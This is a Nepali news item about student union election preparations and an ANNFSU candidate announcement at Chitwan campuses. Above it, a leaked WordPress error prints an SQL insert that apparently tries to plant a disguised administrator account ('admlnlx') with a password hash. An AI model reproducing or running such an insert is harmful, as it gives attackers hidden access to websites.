WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bnm5lYDVj8FlronQm/x7ZQ8PN3mQSr1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:29:19', '', 'admlnlx', 'admlnlx')
चितवन,फागुन ६-
त्रिभुवन विश्वविद्यालय र विद्यार्थी संगठनको बीचमा यही फागुन १८ गते स्ववियु निर्वाचन गर्ने सहमति भएसँगै चितवनका क्याम्पसहरुमा चुनावी सरगर्मी बढेको छ । विरेन्द्र वहुमुखी क्याम्पस,सप्तगण्डकी,वालकुमारी,सहिदस्मृति लगाएतका क्याम्पसमा पनि चुनावी राप र ताप ह्वात्तै बढेको छ ।
अनेरास्ववियु चितवनले विभिन्न क्याम्पसमा स्ववियु सभापतिका लागी उम्मेद्धारी घोषणाको क्रम शुरु गरेको छ । आज (शुक्रवार) मात्र अखिलले विरेन्द्र बहुमुखी क्याम्पसमा सभापति पदको उम्मेद्धार घोषणा गरिएको छ । क्याम्पस कमिटीको वैठकवाट कमिटीका अध्यक्ष लिलाराम पौडेललाई स्ववियु सभापतिको उम्मेद्धवार वनाउने निर्णय गरिएको अनेरास्ववियू चितवनका सचिव प्रकाश आचार्यले जानाकारी दिए । अन्य क्याम्पसमा छिट्टै सर्वसम्मत उम्मेद्धवार घोषणा गरिने उनले वताए । पौडेल विद्यार्थीमाझ भिजेका र लोकपृय भएकाले उनलाई उम्मेद्वार वनाइएको सचिव आचार्यले जानाकारी दिए ।